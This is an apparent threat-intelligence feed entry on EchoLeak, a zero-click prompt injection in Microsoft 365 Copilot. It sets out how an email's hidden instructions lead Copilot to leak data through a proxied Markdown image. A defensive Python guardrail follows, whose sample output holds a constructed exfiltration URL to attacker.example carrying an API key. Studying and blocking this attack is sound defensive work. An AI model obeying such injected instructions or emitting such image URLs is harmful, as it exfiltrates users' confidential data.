EchoLeak (CVE-2025-32711) Shows Us That AI Security is Challenging
ID: 2e3e2936-4339-50e8-9c8b-f75b7510f95b
STIX ID: report--2e3e2936-4339-50e8-9c8b-f75b7510f95b
Feed Name: Checkmarx Zero
**EchoLeak (CVE-2025-32711)** is a critical zero-click prompt-injection vulnerability in Microsoft 365 Copilot. An attacker sends a specially crafted external email to the target's mailbox; when Copilot's RAG pipeline later retrieves that email as context, the hidden instructions it contains direct Copilot to extract sensitive internal data and to emit a reference-style Markdown image whose URL carries that data and is proxied through an allowed Teams domain, so the data leaves when the image is fetched, with no action by the user. Microsoft patched the issue in June 2025 and reported no known in-the-wild exploitation; the recommended mitigations are DLP, stricter intake controls on external content, reduced agent access, and runtime guardrails.
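A runtime guardrail of the kind the summary recommends, as an added example that is not Checkmarx's or Microsoft's code: it scans Copilot-style Markdown output for images, both inline and reference-style, resolves reference labels to their definitions, and blocks any image whose URL is off the host allowlist, carries a nested URL in a query parameter (the proxy-through-an-allowed-domain pattern described above), or smuggles an unusually long query string. The allowlist, the `/proxy?url=` endpoint, the `attacker.example` host and the sample output are all constructed for the example; nothing here is taken from the real exploit chain.

```python
import re
from urllib.parse import parse_qsl, unquote, urlparse

# Constructed allowlist: hosts the rendering surface may fetch images from.
ALLOWED_IMAGE_HOSTS = {"teams.microsoft.com", "sharepoint.com"}

# Inline image: ![alt](url) or ![alt](<url> "title")
INLINE_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)')
# Reference-style image use: ![alt][label] or ![label][]; the lookahead skips inline images
REF_IMAGE = re.compile(r"!\[([^\]]*)\](?:\[([^\]]*)\])?(?!\()")
# Reference definition line: [label]: url "optional title"
REF_DEF = re.compile(r"^ {0,3}\[([^\]]+)\]:\s*<?(\S+?)>?(?:\s+\S.*)?$", re.MULTILINE)


def extract_image_urls(markdown):
    """Return (style, url) for every image, resolving reference labels to their definitions."""
    definitions = {label.strip().lower(): url for label, url in REF_DEF.findall(markdown)}
    found = [("inline", m.group(1)) for m in INLINE_IMAGE.finditer(markdown)]
    for m in REF_IMAGE.finditer(markdown):
        alt, label = m.group(1), m.group(2)
        key = (label or alt).strip().lower()  # ![label][] and ![label] use the alt text as label
        if key in definitions:
            found.append(("reference", definitions[key]))
    return found


def looks_like_url(value):
    """True if a (possibly percent-encoded) parameter value is itself a URL."""
    v = unquote(value).strip().lower()
    return v.startswith(("http://", "https://", "//"))


def check_image_url(url, allowed_hosts=ALLOWED_IMAGE_HOSTS, max_query_len=64):
    """Return the reasons an image URL must not be rendered; an empty list means it is allowed."""
    reasons = []
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme not in ("http", "https"):
        reasons.append(f"non-http scheme: {parsed.scheme or '(none)'}")
    if not any(host == d or host.endswith("." + d) for d in allowed_hosts):
        reasons.append(f"host not in allowlist: {host or '(none)'}")
    # Proxy/redirect pattern: an allowed host is asked to fetch a URL the attacker controls.
    for key, value in parse_qsl(parsed.query, keep_blank_values=True):
        if looks_like_url(value):
            reasons.append(f"query parameter '{key}' carries a nested URL (proxy/redirect pattern)")
    # Retrieved secrets leave inside the URL itself, so cap how much data an image URL may carry.
    carried = len(parsed.query) + len(parsed.fragment)
    if carried > max_query_len:
        reasons.append(f"query/fragment carries {carried} chars, exceeds {max_query_len}: possible data smuggling")
    return reasons


def audit_model_output(markdown):
    """List every image in the model's Markdown output that fails a check."""
    return [
        {"style": style, "url": url, "reasons": reasons}
        for style, url in extract_image_urls(markdown)
        if (reasons := check_image_url(url))
    ]


def sanitize_model_output(markdown):
    """Neutralise blocked image URLs in place so the client never fetches them."""
    for finding in audit_model_output(markdown):
        markdown = markdown.replace(finding["url"], "about:blank#blocked")
    return markdown


# Constructed Copilot-style output: a benign inline image plus a reference-style image whose
# definition routes through a hypothetical proxy endpoint on an allowed host.
SAMPLE_OUTPUT = """Here is the summary you asked for.

![logo](https://teams.microsoft.com/static/logo.png)

![status][ref1]

[ref1]: https://teams.microsoft.com/proxy?url=https%3A%2F%2Fattacker.example%2Fc.png%3Fd%3DAPIKEY-12345
"""

if __name__ == "__main__":
    for f in audit_model_output(SAMPLE_OUTPUT):
        print(f"BLOCK {f['style']} image {f['url']}")
        for r in f["reasons"]:
            print("  -", r)
    print(sanitize_model_output(SAMPLE_OUTPUT))
```

The check deliberately treats reference-style images the same as inline ones, because a filter that only looks at `![alt](url)` misses the `[label]: url` definition that the summary says was used here. Host allowlisting alone is also not enough: the sample URL passes the allowlist and is caught only by the nested-URL and query-length rules, which is why both are applied to every image before the client is allowed to render it.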
